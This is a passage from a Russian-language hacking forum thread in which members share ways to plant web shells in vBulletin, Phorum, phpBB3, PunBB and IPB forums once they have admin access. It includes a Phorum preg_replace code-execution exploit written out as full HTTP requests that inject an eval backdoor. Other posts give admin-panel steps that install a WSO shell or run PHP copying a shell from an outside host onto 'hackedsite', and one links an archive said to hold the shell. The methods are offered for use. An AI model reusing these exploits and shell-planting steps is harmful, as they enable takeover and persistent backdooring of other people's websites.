Старый 19.04.2012, 23:48   #31
GNK
 
Регистрация: 19.04.2012
Сообщений: 5
Репутация: 0
По умолчанию

заливка шелла в vBulletin
Uploading Shell through VB AdminCP

vbulletin hack By Uploading Shell
GNK вне форума   Ответить с цитированием
Старый 25.06.2012, 14:59   #32
c411k
 
Регистрация: 17.07.2010
Сообщений: 27
Репутация: 29
По умолчанию

// phorum <= 5.2.18 preg_replace RCE
// need admin priv
// by me

phorum/mods/replace/replace.php
PHP код:
foreach($PHORUM["mod_replace"] as $entry){

    
$entry["replace"]=str_replace(array("<"">"), array("<"">"), $entry["replace"]);
    
    if(
$entry["pcre"]){
        
$body=preg_replace("/$entry[search]/is"$entry["replace"], $body);
    } else {
        
$body=str_replace($entry["search"], "$entry[replace]"$body);
    }

1. phorum/admin.php?module=mods
Simple Text Replacement Mod ON

2. phorum/admin.php?module=modsettings&mod=replace

POST!
Код:
POST http://localhost/phorum/admin.php
Host: localhost
Cookie:phorum_admin_session=*******
Content-Type: application/x-www-form-urlencoded

module=modsettings&mod=replace&curr=0&search=rdot/e%00&replace=eval($_REQUEST[olo])&pcre=1
3. phorum/posting.php

POST
Код:
POST http://localhost/phorum/admin.php
Host: localhost
Cookie:phorum_admin_session=*******; phorum_session_v5=**********;
Content-Type: multipart/form-data; boundary=---------------------------114782935826962

-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="forum_id"\r\n
\r\n
2\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="message_id"\r\n
\r\n
0\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="message_id:signature"\r\n
\r\n
f75fe9fb4c4e241fdfe02c04a7e70937\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="user_id"\r\n
\r\n
1\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="datestamp"\r\n
\r\n
\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="status"\r\n
\r\n
0\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="author"\r\n
\r\n
lol\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="email"\r\n
\r\n
\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="forum_id"\r\n
\r\n
2\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="thread"\r\n
\r\n
1\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="parent_id"\r\n
\r\n
1\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="allow_reply"\r\n
\r\n
1\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="special"\r\n
\r\n
\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="attachments"\r\n
\r\n
YTowOnt9\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="attachments:signature"\r\n
\r\n
ea7531271623877e68eaa92900f8d548\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="meta"\r\n
\r\n
YTowOnt9\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="meta:signature"\r\n
\r\n
ea7531271623877e68eaa92900f8d548\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="thread_count"\r\n
\r\n
0\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="mode"\r\n
\r\n
reply\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="subject"\r\n
\r\n
Re: Test Message\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="body"\r\n
\r\n
rdot\r\n
-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="olo"\r\n
\r\n
phpinfo();\r\n-----------------------------114782935826962\r\n
Content-Disposition: form-data; name="preview"\r\n
\r\n
 Preview \r\n
-----------------------------114782935826962--\r\n
c411k вне форума   Ответить с цитированием
Старый 26.06.2012, 22:11   #33
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Цитата:
Сообщение от it's my Посмотреть сообщение
Заливка шелла в PunBB 1.2.17
admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz
шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)

Для версии 1.2.20 есть что-то? Указанный способ не подходит в виду отсутствия packager
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 15.07.2012, 21:50   #34
Sleep
 
Регистрация: 29.04.2012
Сообщений: 17
Репутация: 4
По умолчанию

phpbb3 через модуль AUTOMOD.
1.идем в админку сверху жмем на вкладку ACP_CAT_MODS или AUTOMOD какая есть =)
2.Снизу Upload MOD -> выбираем файл test.zip жмем аплоад. после чего должно появится в Uninstalled MODs название нашего мода: Auto ACP redirection. жмем Install
3.идем http://site.ru/phpbb3/umil/wso.php

в архиве: test.zip
wso.php сам шелл.
install_mod.xml
27 строка
PHP код:
<copy>
<
file from="wso.php" to="/umil/wso.php" /> // что копируем и куда.
</copy
_http://www.sendspace.com/file/zxlp61

Последний раз редактировалось Sleep; 15.07.2012 в 21:53..
Sleep вне форума   Ответить с цитированием
Старый 02.10.2012, 20:43   #35
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

IPB 3.* (проверено на 3.2.3)
Условие - доступ в админку.
Система - системные настройки - глобальные настройки - Добавить настройку.
Все поля заполняем интуитивно, в поле "PHP, исполняемый при показе и сохранении настройки" пишем что-то типа
PHP код:
copy('http://site.ru/shell.txt','/var/www/site.com/shell.php'); 
Доступные на запись директории можно найти "Поддержка - диагностика - проверка прав доступа", а дальше по обстоятельствам.



UPD: сработало также на версии 2.3.6
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica

Последний раз редактировалось nomad; 26.01.2013 в 19:31..
nomad вне форума   Ответить с цитированием
Старый 05.10.2012, 13:06   #36
tracy
 
Регистрация: 05.07.2010
Сообщений: 21
Репутация: 4
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
IPB 3.* (проверено на 3.2.3)
Условие - доступ в админку.
Система - системные настройки - глобальные настройки - Добавить настройку.
Все поля заполняем интуитивно, в поле "PHP, исполняемый при показе и сохранении настройки" пишем что-то типа
PHP код:
copy('http://site.ru/shell.txt','/var/www/site.com/shell.php'); 
Доступные на запись директории можно найти "Поддержка - диагностика - проверка прав доступа", а дальше по обстоятельствам.
Заливаю на 3.2.3 лицензию..шелл заливается,но открывается как текст! почему?
tracy вне форума   Ответить с цитированием
Старый 05.10.2012, 14:08   #37
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

.htaccess в каталоге с залитым шелом?
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 06.10.2012, 08:34   #38
tracy
 
Регистрация: 05.07.2010
Сообщений: 21
Репутация: 4
По умолчанию

Цитата:
Сообщение от M@ZAX@KEP Посмотреть сообщение
.htaccess в каталоге с залитым шелом?
незнаю. но форум лицензия

Последний раз редактировалось tracy; 06.10.2012 в 08:36..
tracy вне форума   Ответить с цитированием
Старый 06.10.2012, 17:32   #39
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

Цитата:
незнаю
Гениально, блин. А посмотреть пробовал? Скачать движок той же версии, например (или той же ветки, если не удаётся точнее определить). Если нет, возможно админ сам его добавил. Поищи другие каталоги для аплоада.
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 06.12.2012, 22:41   #40
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию vBulletin 3.8.0

vBulletin 3.8.0 (может, другие версии)
админка - управление модулями - редактировать (в моем примере newpost_complete - модуль, отвечающий за написание нового поста в форуме) - вписываем наш код в "Код PHP модуля".
Т.к. введенный код выполняется в момент добавления поста в форуме, оптимальным будет что-то типа
PHP код:
copy('http://site.com/shell.txt','/var/www/hackedsite/shell.php'); 
с последующей очисткой модуля от вашего кода. Вариант извращенный немного, но для коллекции пойдет.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot